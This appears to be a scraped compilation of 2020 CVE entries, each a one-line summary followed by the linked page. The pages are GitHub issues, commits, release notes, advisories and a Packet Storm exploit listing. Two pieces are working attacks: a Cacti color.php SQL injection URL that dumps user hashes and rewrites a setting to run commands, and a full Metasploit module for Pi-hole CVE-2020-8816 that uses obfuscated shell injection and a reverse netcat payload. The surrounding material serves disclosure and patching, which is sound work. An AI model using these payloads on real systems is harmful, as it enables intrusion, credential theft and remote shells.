A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Mayfly277 opened this issue

Jun 17, 2020

· 13 comments

**Comments**

**sqli as admin v1.2.12**

There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.

**To Reproduce**

Steps to reproduce the behavior:

call /cacti/color.php?action=export&header=false&filter=')<SQLI HERE>--+-

**Expected behavior**

change the following lines :  

$sql\_where = "WHERE (name LIKE '%" . get\_request\_var('filter') . "%'

    	/* form the 'where' clause for our main sql query */
    	if (get_request_var('filter') != '') {
    		$sql_where = "WHERE (name LIKE '%" . get_request_var('filter') . "%'
    			OR hex LIKE '%" .  get_request_var('filter') . "%')";
    	} else {
    		$sql_where = '';
    }
    

You should do db_qstr('%' . get_request_var('filter') . '%') instead of '%" . get\_request\_var('filter') . "%.

**Additional context**

*   As the application accept stacked queries, this can easy lead to remote code execution by replacing the path\_php\_binary setting inside the database.

    GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='touch+/tmp/sqli_from_rce;'+where+name='path_php_binary';--+- 
    

*   Then call host.php?action=reindex and get the shell\_exec called with the path\_php\_binary.  
    

Not sure if that was already covered in our current CVE tracker. Have you tested against the very latest 1.2.x branch ?

I tried with that image which use the latest release : quantumobject/docker-cacti  
And the request :

    /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;-- -`
    

Is getting back the users and hash.

The code on this function haven't change in 3 years:

But the filter change 11 months ago and that change bring the issue.

*   The actual code (1.12.x branch):

*   before the issue Non regular expression search filters don't support international characters #2839 fix the code (v1.2.6) seems to be not vulnerable :

This was resolved some time ago in the 1.2.x branch.

> This was resolved some time ago in the 1.2.x branch.

Would you have a commit reference int the 1.2.x branch which is fixing the issue?

No this is **NOT** fixed.  
I just tried with a fresh checkout of 1.2.x. and the exploit still work.  
Please reopen @TheWitness

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Thanks for verifying. And supplying a patch. Could you add the CVE number to the changelog ?

You have to be reviewing something other than the 1.2.x branch. Here is a screen capture of the 1.2.x branch. Tell me which part of this does not conform to your reasoning?

@Mayfly277, after re-reading, I think you are confused. It's "git clone -b 1.2.x ...". It's not "branch 1.12.x, it's 1.2.x.

I'll be damned. Where did that come from. Re-opening. Thanks for being persistent.

From Code: color.php always process filter by function sanitize_search_string.  
And sanitize_search_string will drop char ', , ; and )\`.  
Why your env can get SQL result.

In my test, final SQL like SQL below, all invalid char is dropped, and injection SQL around with single quot:

SELECT \*, 
        SUM(CASE WHEN local\_graph\_id\>0 THEN 1 ELSE 0 END) AS graphs, 
        SUM(CASE WHEN local\_graph\_id\=0 THEN 1 ELSE 0 END) AS templates 
    FROM (
        SELECT c.\*, local\_graph\_id 
        FROM colors AS c LEFT JOIN (
            SELECT color\_id, graph\_template\_id, local\_graph\_id FROM graph\_templates\_item WHERE color\_id\>0 
        ) AS gti ON c.id\=gti.color\_id 
    ) AS rs 
    WHERE (name LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user\_auth %' 
            OR hex LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user\_auth %') 
        AND read\_only\='on' 
    GROUP BY rs.id

 netniV changed the title \[security\] sqli as admin SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)

Jul 12, 2020

CVE-2020-14295: SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295) · Issue #3622 · Cacti/cacti

In affected versions of WordPress, authenticated users with upload permissions (like authors) are able to inject JavaScript into some media file attachment pages in a certain way. This can lead to script execution in the context of a higher privileged user when the file is viewed by them. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 1.7k

*   Code
*   Pull requests 866
*   Actions
*   Security
*   Insights

Permalink

Browse files

Editor: Prevent HTML decoding on by setting the proper editor context.

*   Loading branch information

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -3231,7 +3231,7 @@ function edit\_form\_image\_editor( $post ) {

  

?>

</label\>

<?php wp\_editor( $post\->post\_content, 'attachment\_content', $editor\_args ); ?>

<?php wp\_editor( format\_to\_edit( $post\->post\_content ), 'attachment\_content', $editor\_args ); ?>

  

</div\>

<?php

**0 comments on commit 0977c0d**

Please sign in to comment.

CVE-2020-4047: Editor: Prevent HTML decoding on by setting the proper editor context. · WordPress/wordpress-develop@0977c0d

An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. include/rcmail_output_html.php allows XSS via the username template object.

This is a service and security update to the LTS version 1.3 of Roundcube Webmail.  
It contains four fixes for recently reported security vulnerabilities as well a  
small number of general improvements backported from the latest stable version.  
See the full changelog below.

**Security fixes**

*   Fix XSS issue in template object 'username' (#7406)
*   Fix cross-site scripting (XSS) via malicious XML attachment
*   Fix a couple of XSS issues in Installer (#7406)
*   Better fix for CVE-2020-12641

The latter two vulnerabilities again are related to public access to the Roundcube installer  
and are therefore classified minor.

This version in considered stable and we recommend to update all productive installations  
of Roundcube 1.3.x with it. Please do backup your data before updating!

**CHANGELOG**

*   Security: Better fix for CVE-2020-12641
*   Security: Fix XSS issue in template object 'username' (#7406)
*   Security: Fix couple of XSS issues in Installer (#7406)
*   Security: Fix cross-site scripting (XSS) via malicious XML attachment

CVE-2020-13964: Release Roundcube Webmail 1.3.12 · roundcube/roundcubemail

PHPMailer before 6.1.6 contains an output escaping bug when the name of a file attachment contains a double quote character. This can result in the file type being misinterpreted by the receiver or any mail relay processing the message.

**Impact**

CWE-116: Incorrect output escaping.

An attachment added like this (note the double quote within the attachment name, which is entirely valid):

    $mail->addAttachment('/tmp/attachment.tmp', 'filename.html";.jpg');
    

Will result in a message containing these headers:

    Content-Type: application/octet-stream; name="filename.html";.jpg"
    Content-Disposition: attachment; filename="filename.html";.jpg"
    

The attachment will be named filename.html, and the trailing ";.jpg" will be ignored. Mail filters that reject .html attachments but permit .jpg attachments may be fooled by this.

Note that the MIME type itself is obtained automatically from the _source filename_ (in this case attachment.tmp, which maps to a generic application/octet-stream type), and not the _name_ given to the attachment (though these are the same if a separate name is not provided), though it can be set explicitly in other parameters to attachment methods.

**Patches**

Patched in PHPMailer 6.1.6 by escaping double quotes within the name using a backslash, as per RFC822 section 3.4.1, resulting in correctly escaped headers like this:

    Content-Type: application/octet-stream; name="filename.html\";.jpg"
    Content-Disposition: attachment; filename="filename.html\";.jpg"
    

**Workarounds**

Reject or filter names and filenames containing double quote (") characters before passing them to attachment functions such as addAttachment().

**References**

CVE-2020-13625.  
PHPMailer 6.1.6 release

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in the PHPMailer repo

CVE-2020-13625: 2020-05-26 Insufficient output escaping of attachment names

phpList before 3.5.4 allows XSS via /lists/admin/user.php and /lists/admin/users.php.

phpList 3.5.4 is now available for download, including several security fixes reported by: @r0ck3t1973, Songohan22 and Penghui Li, Sarthak Saini and  Carlos Ramírez.

Additionally, this release includes a “Beta” version of “Generate Preview” option that makes it possible for you to see how the preview of your campaign will look in most email clients.  
You can check what the current implementation can and can not do here and you can propose  future improvements in the mantis issue.  
Thanks to @samtuke for implementing this.

**Changes in this release****Usability improvements and functionality enhancements:**

1.  Clickable link at the top of the click stats page — thanks to @samtuke, see \[the pull request\](https://github.com/phpList/phplist3/pull/656)
2.   Added HTTP\_Request2 as a fallback when curl is not available — thanks to @duncanc, see \[the pull request\](https://github.com/phpList/phplist3/pull/652) for more details.
3.  Updater menu entry is now shown only for superusers
4.  The updater handles deletion of broken symlinks
5.   Help added for the website field on the Settings page and updated help texts about date format and ‘ tracking codes — thanks to @duncanc

**Fixes**

1.  \[Security Fix\]: Implement XSS filters in /lists/admin/admin.php and /lists/admin/admins.php — thanks to Sarthak Saini for reporting the issue and @xh3n1 for providing the fix.
2.  \[Security Fix\]: Implement XSS filter in /lists/admin/user.php and /lists/admin/users.php — thanks to Carlos Ramírez from wizlynx group for reporting the issue.
3.  \[Security Fix\]: Implement XSS filter in /lists/admin/editattributes.php — thanks to @r0ck3t1973 for reporting the issue
4.  \[Security Fix\]: Implement XSS filter in /lists/admin/send\_core.php — thanks to @r0ck3t1973 for reporting the issue
5.  \[Security Fix\]: Implement XSS filter in /lists/admin/connect.php and /lists/admin/subscribelib2.php — thanks to @r0ck3t1973  for reporting the issue
6.  \[Security Fix\]: Implement XSS filter in /lists/admin/configure.php and /lists/admin/list.php — thanks to @r0ck3t1973 for reporting the issue
7.  \[Security Fix\]: Implement XSS filter in /lists/admin/importsimple.php and /inc/magic\_quotes.php — thanks to @Songohan22  for reporting the issue
8.  \[Security Fix\]: Switch to strict comparison in  /lists/admin/index.php and  /lists/admin/subscribelib2.php — thanks to @peng-hui for reporting the issue
9.  Updated default list of TLDs — thanks to @duncanc for pointing it out the problem
10.  Fixed incorrect statistics link in German installations, due to incorrect translation see \[mantis issue\](https://mantis.phplist.org/view.php?id=20183) — please consider that fetching translations won’t fix the issue for now. It’s the update itself that uses the corrected version. Thanks to @jimbocity for reporting it.
11.  Fixed broken link in the Install file — thanks to \[Hiroyuki Sato\]( https://github.com/hiroyuki-sato)

**Other**

*   Changed config value for “$database\_host ” from ‘localhost’ to ‘dbhost’ — enabling a default setup that works with a DB that is not on the same machine

****

This release is the work of Duncan Cameron, Sam Tuke, Xheni Myrtaj and other Open Source community members who have submitted bug reports and valuable feedback, as well as phpList Ltd. developers. To get involved in phpList development, check out the developer resources pages.

Report any issues you find with phpList 4 core or REST API  to the corresponding repo on GitHub. Please read the contribution guide on how to contribute to these modules.

**Support**

Need help upgrading your phpList server to the newest version? Ask the community at discuss.phplist.org. Professional support from community experts, as well as manuals, source code, and developer resources, can be found at phplist.org. Report all bugs to the bugtracker!

Want to focus on campaigns and forget hosting headaches? Sign up at phplist.com for an account with everything included. Send from 300 free messages to 30 million messages per month — simple.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.Accept Read More

CVE-2020-13827: phpList 3.5.4 released: Security Release

Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Pi-Hole DHCP MAC OS Command Execution',        'Description' => %q{          This exploits a command execution in Pi-Hole <= 4.3.2.  A new DHCP static lease is added          with a MAC address which includes an RCE.  Exploitation requires /opt/pihole to be first          in the $PATH due to exploitation constraints.  DHCP server is not required to be running.        },        'License' => MSF_LICENSE,        'Author' =>          [            'h00die', # msf module            'nateksec' # original PoC, discovery          ],        'References' =>          [            ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],            ['CVE', '2020-8816']          ],        'Platform' => ['unix'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' =>          [            [ 'Automatic Target', {}]          ],        'DisclosureDate' => 'Mar 28 2020',        'DefaultTarget' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/reverse_netcat'        },        'Payload' => {          'BadChars' => "\x00"        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])      ]    )  end  def check    begin      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),        'method' => 'GET'      )      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200      # vDev (HEAD, v4.3-0-g44aff72)      # v4.3      %r{<b>Web Interface Version\s*</b>\s*(vDev $HEAD, )?v?(?<version>[\d\.]+)$?.*<b>}m =~ res.body      if version && Gem::Version.new(version) <= Gem::Version.new('4.3.2')        vprint_good("Version Detected: #{version}")        return CheckCode::Appears      else        vprint_bad("Version Detected: #{version}")        return CheckCode::Safe      end    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")    end    CheckCode::Safe  end  def login(cookie)    vprint_status('Login required, attempting login.')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),      'cookie' => cookie,      'vars_get' => {        'tab' => 'piholedhcp'      },      'vars_post' => {        'pw' => datastore['PASSWORD']      },      'method' => 'POST'    )  end  def add_static(payload, cookie, token)    # we don't use vars_post due to the need to have duplicate fields    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),      'ctype' => 'application/x-www-form-urlencoded',      'cookie' => cookie,      'method' => 'POST',      'vars_get' => {        'tab' => 'piholedhcp'      },      'data' => [        'AddMAC=',        'AddIP=',        'AddHostname=',        "AddMAC=#{URI.encode_www_form_component(payload)}",        "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s        "AddHostname=#{rand_text_alphanumeric(8..12)}",        'addstatic=',        'field=DHCP',        "token=#{URI.encode_www_form_component(token)}"      ].join('&')    )  end  def exploit    if check != CheckCode::Appears      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')    end    begin      @macs = []      # get cookie      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')      )      cookie = res.get_cookies      print_status("Using cookie: #{cookie}")      # get token      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),        'cookie' => cookie,        'vars_get' => {          'tab' => 'piholedhcp'        }      )      # check if we got hit by a login prompt      if res && res.body.include?('Sign in to start your session')        res = login(cookie)      end      if res && res.body.include?('Sign in to start your session')        fail_with(Failure::BadConfig, 'Incorrect Password')      end      # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">      # may also include /      %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body      unless token        fail_with(Failure::UnexpectedReply, 'Unable to find token')      end      print_status("Using token: #{token}")      # from the excellent writeup about the vuln:      # The biggest difficulty in exploiting this vulnerability is that the user input is      # capitalized through a call to "strtoupper". Because of this, no lower case character      # can be used in the resulting injection.      # we'd like to execute something similar to this:      # aaaaaaaaaaaa&&php -r 'PAYLOAD'      # however, we need to pull p, h, and r from the system due to all input getting capitalized      # this is performed by pulling them from the $PATH which should be something like      # /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin      # first payload we send is to check that this is in the path to verify exploitation is possible      mac = rand_text_hex(12).upcase      @macs << mac      vprint_status("Validating path with MAC: #{mac}")      res = add_static("#{mac}$PATH", cookie, token)      # ruby regex w/ interpolate and named assignments needs to be in .match instead of =~      env = res.body.match(/value="#{mac}(?<env>.*)">/)      if env && env[:env].starts_with?('/opt/pihole')        print_good("System env path exploitable: #{env[:env]}")      else        msg = '/opt/pihole not in path. Exploitation not possible.'        if env          msg += " Path: #{env[:env]}"        end        fail_with(Failure::UnexpectedReply, msg)      end      # once we have php -r, we then need to pass a payload.  So we do this via php command      # exec on hex2bin since our payload in hex caps will still get processed and executed.      mac = rand_text_hex(12).upcase      @macs << mac      print_status("Payload MAC will be: #{mac}")      shellcode = "#{mac}&&" # mac address, arbitrary      shellcode << 'W=${PATH#/???/}&&'      shellcode << 'P=${W%%?????:*}&&'      shellcode << 'X=${PATH#/???/??}&&'      shellcode << 'H=${X%%???:*}&&'      shellcode << 'Z=${PATH#*:/??}&&'      shellcode << 'R=${Z%%/*}&&$'      shellcode << "P$H$P$IFS-$R$IFS'EXEC(HEX2BIN(" # php -r exec(hex2bin(      shellcode << '"'      shellcode << payload.encoded.unpack('H*').join('') # hex encode payload      shellcode << '"));'      shellcode << "'&&"      vprint_status("Shellcode: #{shellcode}")      print_status('Sending Exploit')      add_static(shellcode, cookie, token)      # we don't use vars_post due to the need to have duplicate fields      ip = '192.168'      2.times {ip="#{ip}.#{rand_text_numeric(1..2).to_i}"} #to_i removes leading zeroes      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),        'ctype' => 'application/x-www-form-urlencoded',        'cookie' => cookie,        'method' => 'POST',        'vars_get' => {          'tab' => 'piholedhcp'        },        'data' => [          'AddMAC=',          'AddIP=',          'AddHostname=',          "AddMAC=#{URI.encode_www_form_component(shellcode)}",          "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s          "AddHostname=#{rand_text_alphanumeric(3..8)}",          'addstatic=',          'field=DHCP',          "token=#{URI.encode_www_form_component(token)}"        ].join('&')      )    # entries are written to /etc/dnsmasq.d/04-pihole-static-dhcp.conf    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")    end  end  def on_new_session(session)    super    @macs.each do |mac|      print_status("Attempting to clean #{mac} from config")      session.shell_command_token("sudo pihole -a removestaticdhcp #{mac}")    end  endend

CVE-2020-8816: Pi-Hole 4.3.2 DHCP MAC OS Command Execution ≈ Packet Storm

In QEMU 5.0.0 and earlier, es1370_transfer_audio in hw/audio/es1370.c does not properly validate the frame count, which allows guest OS users to trigger an out-of-bounds access during an es1370_write() operation.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2020-13361: security - CVE-2020-13361 QEMU: es1370: OOB access due to incorrect frame count leads to DoS

sd_wp_addr in hw/sd/sd.c in QEMU 4.2.0 uses an unvalidated address, which leads to an out-of-bounds read during sdhci_write() operations. A guest OS user can crash the QEMU process.

CVE-2020-13253: security - CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in DoS

An issue was discovered in ssl.c in Axel before 2.17.8. The TLS implementation lacks hostname verification.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

It looks like Axel's SSL's connections do not verify server certificate hostnames. To fix this the SSL context should set a certificate callback or use SSL_set1_host to set the intended hostname.

This is an issue since it uses SSL_CTX_set_default_verify_paths and loads all root authorities from the OS. See https://wiki.openssl.org/index.php/Hostname\_validation for a description of this nuance with the OpenSSL APIs.

Here is potentially insecure code  
https://github.com/axel-download-accelerator/axel/blob/master/src/ssl.c#L83

\[...\]
ssl\_ctx = SSL\_CTX\_new(SSLv23\_client\_method());
if (!conf->insecure) {
    SSL\_CTX\_set\_default\_verify\_paths(ssl\_ctx);
    SSL\_CTX\_set\_verify(ssl\_ctx, SSL\_VERIFY\_PEER, NULL);
}
SSL\_CTX\_set\_mode(ssl\_ctx, SSL\_MODE\_AUTO\_RETRY);

ssl = SSL\_new(ssl\_ctx);
SSL\_set\_fd(ssl, fd);
SSL\_set\_tlsext\_host\_name(ssl, hostname);

int err = SSL\_connect(ssl);
if (err <= 0) {
\[...\]

davidpolverari pushed a commit to davidpolverari/axel that referenced this issue

Aug 26, 2021

 

2 participants

CVE-2020-13614: Axel may not verify server certificate CN/SAN/hostname (allowing SSL interception) · Issue #262 · axel-download-accelerator/axel

In Cacti before 1.2.11, auth_profile.php?action=edit allows CSRF for an admin email change.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#php